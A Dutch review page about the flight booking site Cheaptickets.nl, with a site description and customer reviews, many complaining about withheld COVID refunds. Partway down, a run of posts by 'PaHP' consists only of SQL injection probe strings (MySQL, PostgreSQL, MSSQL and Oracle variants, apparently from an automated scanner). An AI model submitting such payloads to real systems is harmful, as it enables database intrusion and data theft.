NederlandReview

  Ervaringen Cheaptickets.nl

  Wat vinden Nederlanders van Cheaptickets.nl? Lekker goedkoop op vakantie, maar geen idee waar u moet beginnen. Cheaptickets.nl kan een hele handige manier voor u zijn om prijzen en mogelijkheden van verschillende vluchten en airlines met elkaar te vergelijken. Hier op NederlandReview kunt u ervaringen van andere mensen vinden, zodat u zeker weet dat u met een betrouwbare site te maken hebt.

  Over Cheaptickets.nl

  Cheaptickets bied goedkope vakanties aan die je heel makkelijk met elkaar kunt vergelijken. Dit varieert van een zonvakantie tot een verre reis of een autovakantie. Voer uw vertrekpunt, uw aankomst bestemming en uw reisdata in en met één druk op de knop komt er een overzicht op uw scherm met alle mogelijke reizen. Cheaptickets.nl vergelijkt de vluchten van alle vliegtuigmaatschappijen, waardoor zo snel de goedkoopste vlucht kan worden weergegeven. De vlucht kan worden geselecteerd naar aanleiding van uw wensen. U hoeft alleen maar te kiezen voor de snelste vlucht, de goedkoopste vlucht, de beste vliegtuigmaatschappij of het ticket met de kortste reistijd.


  Supergrappige prank van cheaptickets!

  Diensten

  Cheaptickets.nl geeft in één overzicht weer wat de beschikbare vluchten zijn van verschillende vliegticket aanbieders. U kunt snel en gemakkelijk via iDeal betalen, waarna u na vijf minuten uw ticket in uw mail hebt ontvangen. Naast de vliegtickets kunt u ook een hotel bijboeken bij verschillende hotelaanbieders, of zelfs een auto huren. U hoeft dit niet allemaal los te boeken, maar u kunt ook kiezen voor een pakket-deal. Cheaptickets.nl biedt ook last-minute vluchten aan, waardoor u vaak een nog lagere prijs heeft en snel in het vliegtuig kan zitten op weg naar de zon. Het zoeken naar een vlucht en het boeken van een ticket kan binnen enkele minuten gedaan zijn. Uw ticket boekt u al in vijf stappen, namelijk 1: Het invoeren van uw vluchtgegevens, 2: het kiezen van het voordeligste ticket, 3: Het invoeren van uw persoonlijke gegevens, 4: het betalen van uw ticket en tenslotte stap 5: u ontvangt een bevestiging van uw geboekte reis.

  Klachten

  Cheaptickets.nl beweert dat de medewerkers graag openstaan voor vragen of extra wensen van de klanten. Wilt u bijvoorbeeld extra beenruimte, heeft u een verkeerde naam ingevuld bij het boeken of wilt u uw vlucht wijzigen, dan staat de klantenservice voor u klaar. U kunt ze bereiken per telefoon of per e-mail. Op de website is vermeld dat er ook gebruik gemaakt kan worden van een chat-functie met een medewerker als u geen zin/tijd heeft om te bellen, maar er staat nergens vermeld waar deze functie te vinden is. Vliegtickets zijn niet goedkoop, daarom wilt u zeker weten dat u de laagste prijs heeft en u uw tickets boekt bij een betrouwbare site. Wij van NederlandReview hebben geen ervaring met Cheaptickets.nl, dus we weten niet hoe u behandeld wordt als klant. Deel daarom nu uw verhaal, mening, klacht of compliment over Cheaptickets.nl, zodat de rest van Nederland weet waar ze mee te maken kunnen krijgen als ze gaan voor de goedkoopste zonvakantie of andere reis!  TIP! Dit bedrijf staat in onze top 20 reis-organisaties 2016 !! Lees hier snel het artikel.

  Zijn goedkope tickets echt zo goedkoop of koop je een kat in de zak? Lees reis-ervaringen van consumenten en weet waar u aan begint

  Cheaptickets.nl
  Beoordelingen, klachten, ervaringen en reviews (51)

  4.2
  39% Zou hier weer kopen!
  Bestellen
  rating
  4.8
  Service
  rating
  3.2
  Prijs
  rating
  4.8
  Leveren
  rating
  3.8

  Schrijf nieuwe review

  Lees hier onafhankelijke reviews, klachten en ervaringen. Wees op de hoogte waar u uw aankoop kunt doen of beoordeel zelf een winkel waar u een (online) aankoop heeft gedaan. Zo bepaalt tegenwoordig heel Nederland zelf welke winkels slecht en goed zijn!

  Schrijf zelf een review over Cheaptickets.nl

  Uw beoordeling

  Tickets

  We boekten in januari een ticket voor de Filipijnen via China in april. Het was het goedkoop en tickets hadden we snel in onze e-mail.
  Toen werd het corona virus wereldwijd bekend en vluchten gingen niet meer via China. Alleen gold deze restrictie tot nu toe maar tot eind maart.
  Via Facebook heb ik Cheaptickets benaderd en zij hebben contact opgenomen met de Chinese vliegtuigmaatschappij. Binnen enkele uren hoorde ik dat ik kosteloos ons ticket kon annuleren. Het terugstorten van het geld kon wel tot 3 maanden duren, maar binnen 3 dagen hadden wij het volledige bedrag op onze rekening staan ( in tegenstelling tot andere reisagenten ( die zijn onbereikbaar en rekenen kosten).
  Hele fijne en vlotte service in een tijd waarin ze het ontzettend druk zullen hebben.

  Door: milou12-02-2020
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Ja
  10
  rating

  Super!

  Wij hadden (heel stom) op een verkeerde datum de tickets geboekt. We hadden er net naast geklikt en daardoor tickets gekocht voor een dag eerder dan we eigenlijk wilden. Na een belletje naar cheaptickets.nl en dat we uitgelegd hadden wat er gebeurd was, hebben ze zonder iets te vragen de tickets omgeboekt. Ik weet niet of dit zo makkelijk was geweest als we dichter bij de datum waren geweest (was lang van tevoren) maar in dit geval was de service top!

  Door: Gast25-06-2015
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Ja
  8
  rating

  Prima service

  Op het laatste moment niet kunnen inchecken omdat persoon in kwestie te jong was, bellen met cheaptickets en ik moet zeggen dat ik bang was om van kastje naar de muur te werden gestuurd werd ik uiterlijk vriendelijk en goed te woord gestaan, ook het terug bellen gebeurde en alles is perfect opgelost zonder extra kosten... voor mij verdienen ze de warme douche...

  Door: Ronald24-07-2018
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Nee
  9.5
  rating

  Gewoon topprijs!

  We hebben begin 2015 tickets gekocht voor de wintervakantie. Goedkoop, snel, betrouwbaar en gewoonweg aan te raden. Het overzicht van de verschillende airlines is gewoon super en we hadden ook echt een hele goedkope reis.

  Door: Thomas Metz25-06-2015
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Ja
  10
  rating

  Vliegticket

  Bought a ticket, tried to change it, they coundn't find me a ticket near my orginal ticket so me and the person in the live support came to a agreement to refund most of the money I paid for the ticket.

  This would take 10 workdays, almost 2 months later I have only received a a very small amount of the money back.

  The support is very hard to reach and I would not recommend this website in the slightest to avoid problems in the near future.

  They have a lot of service issues to fix and improve.

  Door: Lesley Buijs14-12-2021
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Nee
  6.5
  rating

  Annulerings verzekering

  Ik moest mijn tickets annuleren in verband met Covid ziekte en ik heb wel annulerings verzekering betaald tijdens het boeken maarb nu customer service reageert niet op mijn emails... Vreselijk.

  Door: Jacob Chrysochoou13-12-2021
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Ja
  4.5
  rating

  Super!

  Makkelijke site! alles staat handig onder elkaar vergeleken, je kan ook uitwijken naar andere luchthavens en het wordt ook aangegeven als die veel goedkoper zijn!
  Je hoeft alleen maar de goedkoopste te kiezen!

  Door: Annabelle04-04-2016
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Ja
  8
  rating

  Suuuperhandig & goedkoop

  Superhandig dat je direct een overzicht krijgt van alle luchtvaartmaatschappij met prijzen. Gewoon de goedkoopste pakken, want maakt het echt uit tegenwoordig met je precies vliegt?

  Door: Bo van Klink14-07-2015
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Ja
  9
  rating

  goedkopere

  Je moet even zoeken, maar dan vind je hier zeker wel goedkopere vliegkaartjes. Soms laat ik mijn bestemming gewoon afhangen van de aanbieding!

  Door: Axl17-12-2016
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Ja
  8
  rating

  Goedkoop is het zeker

  Niet veel aan toe te voegen. Goedkoop en gewoon de reis die ik wilde dus...doen!

  Door: Gijs Albracht25-06-2015
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Ja
  8
  rating

  vliegtickets

  Dit is geen review van de bestemming, maar van Cheaptickets.nl. Zuid-Afrika is fantastisch, daarom gaan we ook vaker terug, maar Cheaptickets zijn oplichters op eenzame hoogte boven de rest. Bij elke handeling wordt je genaaid. Bedragen worden aan de achterkant aangedikt met allerlei vage, onverdiende kosten. Vluchtschema dusdanig aangepast dat we maar liefst 26 uur onderweg zullen zijn. Je krijgt een email met een button om te bevestigen. Klik daar vooral niet op! Want dan is het al zo ver. Je wordt niet doorgelinked naar een pagina met mogelijkheden of zo. Accepteren of slikken - daar moet je het mee doen. Geen andere opties, onmogelijk te bereiken, behalve chatbot. Vluchtschema aanpassen volgens "handige" button? Nu alleen op basis van offerte. Ik houd mijn hart vast. Wat een huftersbende. NOOIT MEER

  Door: Gideon12-12-2021
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Nee
  2
  rating

  Tickets to china

  Book a ticket from Cheap ticket, but airline was cancelled, and airline told me that agent can pay me back the money, but NO phone call except chat, chat was very slow and told me that I should claimed from airline, which I they can't do anything for me, I realised I was cheated, please don't booked any ticket from Cheapticket!! Untrusted

  Door: Sandy11-12-2021
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Nee
  2
  rating

  2 vliegtickets naar schotland, in 2020, nogsteeds geen geld terug

  Er wordt tegen je gelogen door de “klantenservice” wanneer je nog €430,- terug krijgt. Vlucht met KLM gecanceld door Cheaptickets door corona. Gelijk een restitutie aangevraagd en aangeven niet akkoord te gaan met vouchers of omboekingen. Geen gehoor, vervolgens wordt het alsnog omgeboekt en die vlucht wordt weer door ze gecanceld. Vlucht is dus 2 keer gecanceld en ik heb nogsteeds recht op geld terug. Na 1,5 jaar wachten neem ik contact op met de klantenservice en ze verzinnen de ene leugen na de ander en zeggen dat ze “niks voor me kunnen doen”. Ze zeggen dat wanneer het is omgeboekt je geen geld terug kan krijgen (terwijl wij daar niet akkoord mee zijn gegaan) en ze zeggen dat wij vervolgens niet naar de 2e vlucht gegaan zijn en door KLM genoteerd zijn als “no show”. Daarvoor met KLM gebeld en zij zeggen dat de vlucht inderdaad 2x gecanceld is en wij nogsteeds recht hebben om restitutie van het reisbureau waarmee het is geboekt, dus Cheaptickets. Vervolgens liegen ze daar ook weer om en zeggen ze dat zodra het is omgeboekt, KLM het geld van de boeking heeft en niet zij.

  Ik heb nog nooit zo iets belachelijks meegemaakt en ben diep teleurgesteld. Ik raad het iedereen af hier ooit nog vliegtickets te kopen.

  Door: Consument08-12-2021
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Nee
  2
  rating

  CHNL-17494563 ticket

  Op 12 January een ticket gekocht en wegens corona gecancelled en inmiddels 18 maanden later hoor ik nogsteeds geen piep en wordt er ook geen aanstalte gemaakt om MIJN GELD terug te storten. Het feit dat ik wekelijks mail zonder reactie en nogsteeds reclame mail ontvang van hun is absoluut mind boggling!!! DOE NOOOOOIITTT, I repeat NOOIT, ZAKEN MET CheapTickets! STELLETJE OPLICHTERS

  Door: Imani 16-10-2021
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Ja
  2
  rating

  vliegtickets

  Wat en ongelofelijk slecht bedrijf
  Wat en ongelofelijk slecht bedrijf, ik wacht al bijna 2 jaar op mijn geld terug van mijn tickets uit begin 2020.
  Niet boeken bij deze oplichters club!!!
  Wel geld vangen als het goed gaat maar nu niet thuis geven.
  Zijn telefonische al bijna 2 jaar niet te bereiken.
  Echt een schande, beter een ticket boeken rechtstreeks bij de vliegtuigmaatschappij.
  Duizenden mensen houden ze zo aan het lijntje.
  NIET BOEKEN VIA DEZE SITE

  Door: fred Gerekink04-10-2021
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Nee
  2
  rating

  Reis

  Zeer slechte touroperator alles beloven maar niets na komen.

  Mensen pas op. Boek hier niet ...

  Door: Turkie26-08-2021
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Nee
  2
  rating

  vliegtickets naar Valencia

  Vreselijke maatschappij, je kan geen contact met hun opnemen. niemand antwoord op je mails en in de chat krijg je alleen te spreken met een robot.

  ik heb kaartjes gekocht naar Valencia via cheaptickets, met 20kg bagage erbij. Vervolgens stond mijn bagage niet op mijn vliegticket en moest ik in totaal 150 euro betalen voor mijn bagage op het vliegveld.
  Ik heb meerdere malen contact proberen op te nemen met het bedrijf, maar ik krijg nooit antwoord op mijn mails.

  ik raad cheapticets zeker niet aan, de klantenservice is vreselijk en ze kunnen je vliegtickets niet correct regelen.

  Door: wiktoria16-08-2021
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Nee
  2
  rating

  vliegtickets

  Na annuleren vlucht wegens overlijden moeder (pre covid tickrt chnl-15577179) in januari 2020 wacht ik nog steeds op vergoeding danwel reisvoucher. Je wordt met de een na de andere leugen van cheaptickets geconfronteerd.
  1) het was via cheaptickets niet mogelijk om vlucht om te boeken, maar bleek dat dit wel mogelijk was omdat ik wel nieuwe vlucht kon boeken op de data waarnaar ik wilde wijzigen.
  2. Ze hadden de gegevens voor terugbetaling doorgestuurd naar de luchtvaartmaatschappij maar na een half jaar kreeg ik te horen dat ze dit toch noet gedaan hadden omdat ze het 'vergeten' waren
  3. Ik zou zelf voucher asn moeten vragen bij de luchtvaartmaatschappij terwijl op hun website al duidelijk vermeldt staat dat dit door de tussenpersoon (cheaptickets) moet gebeuren
  4. Na lang communiceren krijg ik de melding/beeijs dat ze voucher hadden aangevraagd alleen was dit voor een lucht sie gewoon had plaatsgevonden (de nieuw geboekte vlucht) in plaats van de vlucht die ik had moeten annuleren
  5. Ze weigeren nu nog langer om voucher aan te vragen en reageren gewoonweg nergens meer op. Als ik bel en ik krijg contact wordt de verbinding verbroken zodra ze mijn gegevens erbij hebben gepakt.

  Allemaal leuk en aardig met deze maatschappij zolang alles goed loopt maar zodra er iets fout gast weigeren ze hun fouten toe te geven en weigeren ze te werken aan een oplossing.

  Als je graag opgelicht wil worden dan moet je vooral via cheaptickets boeken en hopen dat er iets febeurt waardoor de vlucht niet doorgaat. Gegarandeert dat je dan naar je geld kan fluiten.

  Nog nooit zo'n waardeloze organisatie gezien. Onbegrijpelijk dat dit bedrijf nog steeds bestaat want zo'n oplichtersorganisatie als Cheaptickets zou geen bestaansrecht mogen hebben

  Door: Andre16-06-2021
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Nee
  2
  rating

  Vliegtickets

  Reis geboekt en 24 uur na boeking moeten annuleren door medische redenen.
  Na contact met de klantenservice(die enorm slecht te bereiken is) te horen gekregen dat ik 100% van de reissom moest betalen door een zelf bedacht regeltje van ze.

  Na enige tijd kreeg ik het schadeformulier door cheaptickets toegestuurd maar ze doen geen enkele moeite je te helpen met invullen. Personeel wist niks van de annuleringsverzekering en kreeg irrelevante antwoorden op mijn vragen. Uiteindelijk de verzekeringsmaatschappij zelf benaderd en die heeft mij verder geholpen. Door een ander slinks maniertje van cheaptickets maar 70% vergoed gekregen van de reissom. Snap niet dat dit bedrijf nog bestaat en zou iedereen afraden ook maar iets bij hun te boeken

  Door: Mick Kuiper20-05-2021
  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Ja
  2
  rating

  Vliegticket

  Ik wacht nog op mijn geld. Vlucht naar Thailand is in April 2020 geannuleerd. Luchtvaartmaatscappij geeft aan het geld vorig jaar te hebben teruggestort. Kan geen plus punten vonden. Rot bedrijf

  Door: Patricia Botbijl13-05-2021
  PaHP14-05-2021

  hseQ') AND (SELECT 1509 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT (ELT(1509=1509,1))),0x7170767171,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('rQPr'='rQPr

  PaHP14-05-2021

  hseQ' AND (SELECT 1509 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT (ELT(1509=1509,1))),0x7170767171,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'KMjM'='KMjM

  PaHP14-05-2021

  hseQ) AND (SELECT 1509 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT (ELT(1509=1509,1))),0x7170767171,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (3235=3235

  PaHP14-05-2021

  hseQ AND (SELECT 1509 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT (ELT(1509=1509,1))),0x7170767171,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

  PaHP14-05-2021

  hseQ AND (SELECT 1509 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT (ELT(1509=1509,1))),0x7170767171,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bdzZ

  PaHP14-05-2021

  hseQ') AND 4616=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(106)| |CHR(113))||(SELECT (CASE WHEN (4616=4616) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(118)||CHR(11 3)||CHR(113)) AS NUMERIC) AND ('Wkxk'='Wkxk

  PaHP14-05-2021

  hseQ' AND 4616=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(106)| |CHR(113))||(SELECT (CASE WHEN (4616=4616) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(118)||CHR(11 3)||CHR(113)) AS NUMERIC) AND 'zScZ'='zScZ

  PaHP14-05-2021

  hseQ) AND 4616=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(106)| |CHR(113))||(SELECT (CASE WHEN (4616=4616) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(118)||CHR(11 3)||CHR(113)) AS NUMERIC) AND (5120=5120

  PaHP14-05-2021

  hseQ AND 4616=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(106)| |CHR(113))||(SELECT (CASE WHEN (4616=4616) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(118)||CHR(11 3)||CHR(113)) AS NUMERIC)

  PaHP14-05-2021

  hseQ AND 4616=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(106)| |CHR(113))||(SELECT (CASE WHEN (4616=4616) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(118)||CHR(11 3)||CHR(113)) AS NUMERIC)-- yatu

  PaHP14-05-2021

  hseQ') AND 5773 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(106)+CHAR(113) +(SELECT (CASE WHEN (5773=5773) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR (113))) AND ('GhxA'='GhxA

  PaHP14-05-2021

  hseQ' AND 5773 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(106)+CHAR(113) +(SELECT (CASE WHEN (5773=5773) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR (113))) AND 'ElqT'='ElqT

  PaHP14-05-2021

  hseQ) AND 5773 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(106)+CHAR(113) +(SELECT (CASE WHEN (5773=5773) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR (113))) AND (7561=7561

  PaHP14-05-2021

  hseQ AND 5773 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(106)+CHAR(113) +(SELECT (CASE WHEN (5773=5773) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR (113)))

  PaHP14-05-2021

  hseQ AND 5773 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(106)+CHAR(113) +(SELECT (CASE WHEN (5773=5773) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR (113)))-- kkNT

  PaHP14-05-2021

  hseQ') AND 6623=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122) ||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (6623=6623) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(118)||CHR(113)||CHR (113)||CHR(62))) FROM DUAL) AND ('zJyn'='zJyn

  PaHP14-05-2021

  hseQ' AND 6623=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122) ||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (6623=6623) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(118)||CHR(113)||CHR (113)||CHR(62))) FROM DUAL) AND 'EvFg'='EvFg

  PaHP14-05-2021

  hseQ) AND 6623=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122) ||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (6623=6623) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(118)||CHR(113)||CHR (113)||CHR(62))) FROM DUAL) AND (1082=1082

  PaHP14-05-2021

  hseQ AND 6623=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122) ||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (6623=6623) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(118)||CHR(113)||CHR (113)||CHR(62))) FROM DUAL)

  PaHP14-05-2021

  hseQ AND 6623=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122) ||CHR(118)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (6623=6623) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(118)||CHR(113)||CHR (113)||CHR(62))) FROM DUAL)-- ZVCJ

  PaHP14-05-2021

  (SELECT 2216 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT (ELT(2216=2216,1))),0x7170767171,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

  PaHP14-05-2021

  hseQ') ORDER BY 1-- WBln

  PaHP14-05-2021

  hseQ' ORDER BY 1-- oxlz

  PaHP14-05-2021

  hseQ) ORDER BY 1-- gIbC

  PaHP14-05-2021

  hseQ ORDER BY 1-- Ipax

  PaHP14-05-2021

  hseQ ORDER BY 1-- MFIK

  Bestellen
  rating
  Service
  rating
  Prijs
  rating
  Levering
  rating
  Zou hier weer kopen
  Nee
  2
  rating

  FAQ

  Is Cheaptickets.nl een betrouwbaar bedrijf?

  Er zijn 51 ervaringen geplaatst over Cheaptickets.nl. Gemiddeld hebben zij als cijfer een 4.2 gekregen, waarbij 39% van de recensenten hebben aangegeven dat ze hier weer zouden kopen.

  In welke sectoren is Cheaptickets.nl actief?

  Cheaptickets.nl is vooral actief in de categorie Vakantie en daarbinnen gespecialiseerd in de sector(en) Goedkope vakanties

  Ik heb alle reviews goed gelezen. Wat nu?

  Heb je een positieve indruk gekregen door de reviews? Dan kun je naar de website van Cheaptickets.nl gaan en je bestelling plaatsen. Zo niet, zoek dan hier verder naar een ander bedrijf.